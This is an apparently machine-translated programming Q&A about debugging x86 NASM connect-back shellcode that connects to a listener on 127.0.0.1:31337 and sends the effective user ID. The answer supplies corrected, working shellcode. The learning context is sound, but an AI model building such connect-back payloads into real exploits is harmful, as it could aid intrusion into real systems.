我正在尝试编写一些shell代码,它将连接到localhost上端口31337上的侦听器,并发送程序的有效用户ID以用于学习目的。
为了使调试更容易,我构造了以下代码并与nasm一起组装:
BITS 32
section .data
section .bss
section .text
global _start:
_start:
; s = socket(2, 1, 0)
push BYTE 0x66 ; socketcall is syscall #102 (0x66).
pop eax
cdq ; Zero out edx for use as a null DWORD later.
xor ebx, ebx ; ebx is the type of socketcall.
inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array
int 0x80 ; After syscall, eax has socket file descriptor.
xchg esi, eax ; Save socket FD in esi for later.
; connect(s, [2, 31337, <IP address>], 16)
push BYTE 0x66 ; socketcall (syscall #102)
pop eax
inc ebx ; ebx = 2 (needed for AF_INET)
push DWORD 0x0100007f ; Build sockaddr struct: IP address = 127.0.0.1
push WORD 0x697a ; (in reverse order) PORT = 31337
push WORD bx ; AF_INET = 2
mov ecx, esp ; ecx = server struct pointer
push BYTE 16 ; argv: { sizeof(server struct) = 16,
push ecx ; server struct pointer,
push esi ; socket file descriptor }
mov ecx, esp ; ecx = argument array
inc ebx ; ebx = 3 = SYS_CONNECT = connect()
int 0x80
; geteuid(void)
push BYTE 0x31 ; call for geteuid (syscall #49)
pop eax
int 0x80 ; eax = effective user id
mov edi, eax ; store euid for later
; send(3, euid, 8, 0)
push BYTE 0x66 ; socketcall (syscall #102)
pop eax
xor edx, edx ; creating zero for flags
push edx
push BYTE 8 ; size of data to transmit
push edi ; euid
push esi ; file descriptor
mov ebx, 9 ; ebx = 9 = SYS_SEND = send()
mov ecx, esp ; argument array
int 0x80
; exit(1)
push BYTE 1 ; call for exit
pop eax
xor ebx, ebx
int 0x80
当我运行此代码时,成功创建了一个套接字并建立了与我在端口31337上侦听的服务器的连接。但是,我的用户ID未被发送。当我运行strace时,我收到以下输出:
execve("./connect_back", ["./connect_back"], [/* 18 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(31337),
sin_addr=inet_addr("127.0.0.1")}, 16) = 0
geteuid() = 0
send(3, NULL, 8, 0) = -1 EFAULT (Bad address)
_exit(0) = ?
+++ exited with 0 +++
看来我的euid并没有被用作参数。但是,当我在二进制文件上运行gdb时,程序似乎正确设置了发送调用的参数:
我是nasm的新手,所以如果这是一个愚蠢的语法问题,我道歉。谢谢您的帮助!
TL; DR:你在STRACE中为send
看到的值NULL是因为你运行STRACE作为root
用户而Linux发行版上的root
的UID通常是0.在调试器中你看到0x3e8,因为你运行调试器作为非特权用户UID = 1000(即0x3e8)。
sys_send
需要指向要发送的数据的指针,而不是数据。值0x0000和0x03e8被视为内存地址,即使它们不是内存地址。这两个地址都是内存,我们没有读取权限,因此结果是strace
输出的send
中的-EFAULT(错误地址)
您将UID的值传递给send
,而不是指向数据的指针。 send
指向数据,而不是数据本身。此代码将UID压入堆栈,然后使用堆栈地址作为指向UID的指针。指向UID的指针用于调用send
:
BITS 32
section .data
section .bss
section .text
global _start:
_start:
; s = socket(2, 1, 0)
push BYTE 0x66 ; socketcall is syscall #102 (0x66).
pop eax
cdq ; Zero out edx for use as a null DWORD later.
xor ebx, ebx ; ebx is the type of socketcall.
inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array
int 0x80 ; After syscall, eax has socket file descriptor.
xchg esi, eax ; Save socket FD in esi for later.
; connect(s, [2, 31337, <IP address>], 16)
push BYTE 0x66 ; socketcall (syscall #102)
pop eax
inc ebx ; ebx = 2 (needed for AF_INET)
push DWORD 0x0100007f ; Build sockaddr struct: IP address = 127.0.0.1
push WORD 0x697a ; (in reverse order) PORT = 31337
push WORD bx ; AF_INET = 2
mov ecx, esp ; ecx = server struct pointer
push BYTE 16 ; argv: { sizeof(server struct) = 16,
push ecx ; server struct pointer,
push esi ; socket file descriptor }
mov ecx, esp ; ecx = argument array
inc ebx ; ebx = 3 = SYS_CONNECT = connect()
int 0x80
; geteuid(void)
push BYTE 0x31 ; call for geteuid (syscall #49)
pop eax
int 0x80 ; eax = effective user id
push eax ; Put EAX on the stack
mov edi, esp ; Get the address (on stack) of the UID
; send(3, euid, 8, 0)
push BYTE 0x66 ; socketcall (syscall #102)
pop eax
xor edx, edx ; creating zero for flags
push edx
push BYTE 4 ; size of data to transmit
push edi ; euid
push esi ; file descriptor
mov ebx, 9 ; ebx = 9 = SYS_SEND = send()
mov ecx, esp ; argument array
int 0x80
; exit(1)
push BYTE 1 ; call for exit
pop eax
xor ebx, ebx
int 0x80
我发送4个字节的数据(32位整数)而不是8个字节。接收器应该接收包含UID二进制值的4个字节。
如果要将UID作为可打印字符串发送,则必须将UID转换为字符串并将字符串的地址传递给send
。